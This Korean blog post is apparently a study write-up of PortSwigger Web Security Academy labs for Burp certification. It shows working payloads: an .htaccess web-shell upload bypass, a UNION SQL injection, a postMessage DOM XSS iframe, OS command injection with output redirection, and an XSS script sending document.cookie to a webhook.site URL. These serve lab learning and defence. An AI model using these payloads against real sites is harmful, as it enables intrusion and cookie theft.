[BSCP] Burp Suite Certified Practitioner | Practitioner Lab

2026. 2. 3. 22:31·Security Engineering/Web, Mobile Security
본 글은 보안 학습 및 연구 목적으로 작성되었으며, 허가되지 않은 시스템에 대한 공격 또는 테스트는 관련 법령에 따라 처벌될 수 있습니다. 학습 목적으로 작성된 본 글의 내용을 이용하여 위법 행위를 할 경우, 그로 인해 발생하는 모든 책임은 해당 행위를 수행한 당사자에게 있으며, 본 글의 작성자는 이에 대해 책임을 지지 않습니다.
해당 글은 PortSwigger Web Security Academy 실습 내용을 정리한것입니다.

 

 

Lab: Web shell upload via extension blacklist bypass

해당 웹사인트는 .php로 확장자 파일 이외 파일들은 업로드할 수 없다. 웹쉘 확장자를 우회하기 위해 파일 확장자, File signature, Content-Type등 여러가지를 변경하면서 try and error할 수 있지만, apache서버임이 확인되고, .htaccess파일도 업로드 가능하다면 해보는것도 방법이다.

AddType application/x-httpd-php .txt

 

위 내용을 담은 .htaccess 파일을 업로드한다. 이는 .txt 확장자 파일도 실행가능한 MIME type 으로 매핑한다.

파일 업로드 기능 관련 요청메시지에서 filename parameter와 Content header를 각각 .htaccess, text/plain으로 바꾸어 요청하여 악의적인 .htaccess가 업로드 할 수 있다. 

 

위 그림은 .txt 파일을 .php 처럼 실행될 수 있도록 .htaccess를 업로드하고, .txt 확장자 웹쉘을 업로드한 화면이다. 웹쉘 경로를 파악한 뒤 접속하여 실제로 secret 내용을 확인할 수 있다. 

 

 

 

Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

select title, content from table where Var='<input>';

-> select title, content from table where Var='' union select @@version, 'def' # ' 

 

 

 

 

Lab: DOM XSS using web messages and a JavaScript URL

 

xxxx.web-security-academy.net  의  홈페이지에 위와 같이 scritpt가 들어가 있다. 해당 스크립트는 postmessage와 관련된 것이다. postmessage는 cross origin 간 통신을 가능하게 해주는 기술이다. 하지만, misimplementation되면, 해킹의 악용소지가 될 수 있다.

 

위 예제에서는 수신자 역할을 하는 addEventListener메서드 핸들러가 있다. 수신자 안에서 이벤트의 출처(i.e., event.origin)가 validate한지 검사를 하지 않고 있다. e.data를 받아 사용하며 location.href sink statement를 사용하여 javascript scheme을 실행할 수 있어 위험하다. 송신자 입장에서는 특정 origin target을 하면 '*' 대신 특정 origin 목적지를 지정해야 안전하게 사용할 수 있다. 자세한 건 다음 URL에서 확인할 수 있다. plz, refer to this https://cybercx.com.au/blog/post-message-vulnerabilities/ 

 

Introduction to PostMessage Vulnerabilities

Learn how PostMessage vulnerabilities expose web apps to cyber risks and how to safeguard against these threats.

cybercx.com.au

 

https://medium.com/somos-pragma/an-alternative-for-sending-data-to-another-place-or-to-localstorage-postmessage-dc7e72e7ea11

 

Understanding postMessage for Secure Cross-Origin Communication

Hello coders 🖖🏻, In this blog post, I will introduce you to the postMessage API, an amazing yet little-known feature for secure…

medium.com

 

 

해커 서버를 위와 같은 payload를 response로 받을 수 있도록 구성해두고 victicm이 해당 서버로 요청을 하면 위 그림과 같은 repsonse를 받는다. 특히, postmessage에서 '*'를 사용한것을 확인할 수 있다.

 

<iframe src="https://0a9*****06b.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:alert(\'you hacked\')//http:','*')">

 

 

취약한 앱의 cookie를 가지고 있는 특정 개인이 해커서버에 접속하면, 위와 같이 악의적인 스크립트를 실행하게할 수 있다. 여기서는 단순히 alert message만 띄웠지만, 실제로는 cookie를 따로 탈취할 수 있다.

 

*postmessage와 cors는 sop하에서 cross origin 통신을 허용하기 위한 방법이다.

 

 

 

Lab: Blind OS command injection with output redirection

 

submit 기능에서 email 부분에 sleep 10 로 os command 발생함을 확인했고,  || whoami > /var/www/images/output.txt 로 쓰도록했다. 단, 여기서 이미지가 /var/www/images/output.txt에 저장(write)할 수 있다는 사실을 알려준다.

 

추가로, 웹훅 사이트 같은 곳에 요청해서 command결과를 받아보려 했지만, 내부적으로 다른 도메인이면 막는것 같았다. 또한, 소스코드 leak도 해보고 싶었는데, /var/www/html/avatars/ 디렉터리 안에 아무것도 발견할 수 없었다.

 

 

/image?filename=<file> 은 img를 불러오는 URL인데 여기서 output.txt를 조회함으로써, 명령어의 결과를 알 수 있다.

 

 

 

Lab: Exploiting cross-site scripting to steal cookies

<script>
location.href="https://webhook.site/6e9*****0b1?cookie=" + document.cookie;
</script>

 

웹사이트에서 XSS를 발견했고 풀이를 보니 봇이 계속 게시글을 확인하는게 정상인거 같은데, 확인을 안하는거 같다. 원래 문제 풀이에서는 Burp pro버전의 Collaborator를 사용하도록 되어 있는데, 봇이 작동해도 그 도메인에 대한 요청이 아니면 요청을 막나..

 

 

Self-XSS는 되는것을 확인했다.

 

 

Further..

XSS vs CSRF

  • CSRF는 사용자가 할 수 있는 행위에 한해서 악용하는 것인 반면, XSS는 어느 기능에서 취약점이 발생하든지 상관없이 어떤 행동이든 수행하도록 하는것이 다르다. 
  • CSRF는 one way 취약점인 반면, XSS는 two way취약점이다. one way라는 것은 사용자가 악의적인 행동을 하면 그만이고, two way라는 것은 사용자가 악의적인 행동을 함으로써 그 결과가 해커한테 도달해야함을 의미한다. (데이터 추출)
  • CSRF의 measures
    • CSRF token: client와 server가 공유하는 랜덤값으로 client request에 항상 해당 값을 포함하는 방식
    • SameSite cookies: 웹 사이트 쿠키가 언제 다른 사이트로부터 온 요청에 포함시킬지 정하는 브라우저 보안 메커니즘
    • Referer-based validation: 웹 앱 자신 도메인에서 http request가 왔는지 referer header 값을 검사하는 방식

 

 

 

References

https://portswigger.net/web-security/certification

저작자표시 비영리 변경금지 (새창열림)

'Security Engineering > Web, Mobile Security' 카테고리의 다른 글

[PortSwigger] XML external entity Injection  (0) 2026.03.20
[PortSwigger] Cross-site scripting  (0) 2026.02.27
[PortSwigger] Web cache poisoning  (0) 2026.02.20
[PortSwigger] JWT attacks  (0) 2026.02.13
[PortSwigger] Server-Side Template Injection  (0) 2026.02.13
'Security Engineering/Web, Mobile Security' 카테고리의 다른 글
  • [PortSwigger] Cross-site scripting
  • [PortSwigger] Web cache poisoning
  • [PortSwigger] JWT attacks
  • [PortSwigger] Server-Side Template Injection
zeroone-kr
zeroone-kr
  • zeroone-kr
    What is the target?
    zeroone-kr
  • 공지사항

    • 게시된 정보를 악용하여 발생하는 모든 책임은 악용한 사용자⋯
  • 전체
    오늘
    어제
    • 분류 전체보기 (38)
      • Security Engineering (4)
        • RedTeam (7)
        • Web, Mobile Security (7)
        • System Security (4)
        • Embedded Security (0)
      • Security Research (4)
        • Fuzzing (1)
        • Program analysis (0)
        • Embedded Security (3)
        • Artificial Intelligence (0)
      • Background (0)
        • Development (5)
        • Algorithm (2)
        • SQL (0)
      • Book (1)
      • CTF Writeup (3)
  • 블로그 메뉴

    • 홈
    • 태그
    • 방명록
  • 링크

    • About Me
    • emfp (study member)
    • 학식
  • 인기 글

  • 태그

    srop
    Fuzzing
    VCS
    SVF
    llvm
    CTF
    angr
    byteordering
    Embedded
    rehosting
    codeql
    Greedy
    HardwareHacking
    sysprog
    EmbeddedHacknig
    Command Injection
    wanictf
    WebHacking
    burp
    Static Analysis
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.5
zeroone-kr
[BSCP] Burp Suite Certified Practitioner | Practitioner Lab
상단으로

티스토리툴바